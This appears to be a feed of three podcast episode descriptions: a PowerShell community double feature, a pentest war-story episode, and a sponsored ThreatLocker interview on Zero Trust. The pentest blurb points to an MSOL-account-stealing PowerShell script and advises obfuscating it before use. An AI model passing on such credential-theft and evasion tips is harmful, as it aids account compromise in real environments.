In this episode of the PowerShell Podcast, we bring you a special double feature! We chat with Bogdan Calapod live from PDQ HQ, a seasoned security expert and co-founder of Coda, who reflects on his path from hackathon projects to helping organizations secure their environments. Then, we sit down with Lucas Allman live from the PowerShell + DevOps Global Summit, where he shares his journey from podcast listener to conference presenter.

Key topics in this episode include:
Finding Your Place in the PowerShell Community – How Lucas went from listening to the PowerShell Podcast to presenting at Summit.
Overcoming Stage Fright and Imposter Syndrome – Lucas's experience giving his first lightning demo to a room full of PowerShell pros.
The Power of Personal Growth and Knowledge Sharing – Building confidence, contributing to internal user groups, and advocating for automation.
Building Security from the Ground Up – Bogdan's journey from hackathon developer to security co-founder, including the creation of Coda.
Simplifying Security for the Real World – Lessons learned from building tools to automate vulnerability detection and remediation.
Staying Curious and Always Learning – Why continuous education, knowledge sharing, and community engagement are essential for long-term success.

This episode captures the spirit of learning, teaching, and growth that defines the PowerShell community. Whether you're a newcomer or a seasoned pro, this double feature has insights for everyone.

Links:
Connect with Lucas Allman on LinkedIn: https://www.linkedin.com/in/lucas-allman-407a1055/
Follow Bogdan on GitHub: https://github.com/bogdan-calapod
Follow Andrew: https://andrewpla.tech/links
Join PowerShell Wednesdays every Wednesday at 2 PM EST on discord.gg/pdq
The PowerShell Podcast on YouTube: https://youtu.be/Jhxr2GB9-Mg
Today's tale of pentest pwnage is another great one! We talk about:
The SPNless RBCD attack (covered in more detail in this episode)
Importance of looking at all "branches" of outbound permissions that your user has in BloodHound
This devilishly effective MSOL-account-stealing PowerShell script (obfuscate it first!)
A personal update on my frustration with ringing in my ears
In this on-location episode recorded at the RSAC Conference, Sean Martin and Marco Ciappelli sit down once again with Rob Allen, Chief Product Officer at ThreatLocker, to unpack what Zero Trust really looks like in practice, and how organizations can actually get started without feeling buried by complexity.

Rather than focusing on theory or buzzwords, Rob lays out a clear path that begins with visibility. "You can't control what you can't see," he explains. The first step toward Zero Trust is deploying lightweight agents that automatically build a view of the software running across your environment. From there, policies can be crafted to default-deny unknown applications, while still enabling legitimate business needs through controlled exceptions.

The Zero Trust Mindset: Assume Breach, Limit Access
Rob echoes the federal mandate definition of Zero Trust: assume a breach has already occurred and limit access to only what is needed. This assumption flips the defensive posture from reactive to proactive. It's not about waiting to detect bad behavior; it's about blocking the behavior before it starts. The ThreatLocker approach stands out because it focuses on removing the traditional "heavy lift" often associated with Zero Trust implementations. Rob highlights how some organizations have spent years trying (and failing) to activate overly complex systems, only to end up stuck with unused tools and endless false positives. ThreatLocker's automation is designed to lower that barrier and get organizations to meaningful control faster.

Modern Threats, Simplified Defenses
As AI accelerates the creation of polymorphic malware and low-code attack scripts, Zero Trust offers a counterweight. Deny-by-default policies don't require knowing every new threat, just clear guardrails that prevent unauthorized activity, no matter how it's created. Whether it's PowerShell scripts exfiltrating data or AI-generated exploits, proactive controls make it harder for attackers to operate undetected.

This episode reframes Zero Trust from an overwhelming project into a series of achievable, common-sense steps. If you're ready to hear what it takes to stop chasing false positives and start building a safer, more controlled environment, this conversation is for you.

Learn more about ThreatLocker: https://itspm.ag/threatlocker-r974

Note: This story contains promotional content.

Guest: Rob Allen, Chief Product Officer, ThreatLocker | https://www.linkedin.com/in/threatlockerrob/

Resources
Learn more and catch more stories from ThreatLocker: https://www.itspmagazine.com/directory/threatlocker
Learn more and catch more stories from RSA Conference 2025 coverage: https://www.itspmagazine.com/rsac25

Keywords: sean martin, marco ciappelli, rob allen, zero trust, cybersecurity, visibility, access control, proactive defense, ai threats, policy automation, brand story, brand marketing, marketing podcast, brand story podcast

Catch all of our event coverage: https://www.itspmagazine.com/technology-and-cybersecurity-conference-coverage
Want to tell your Brand Story Briefing as part of our event coverage?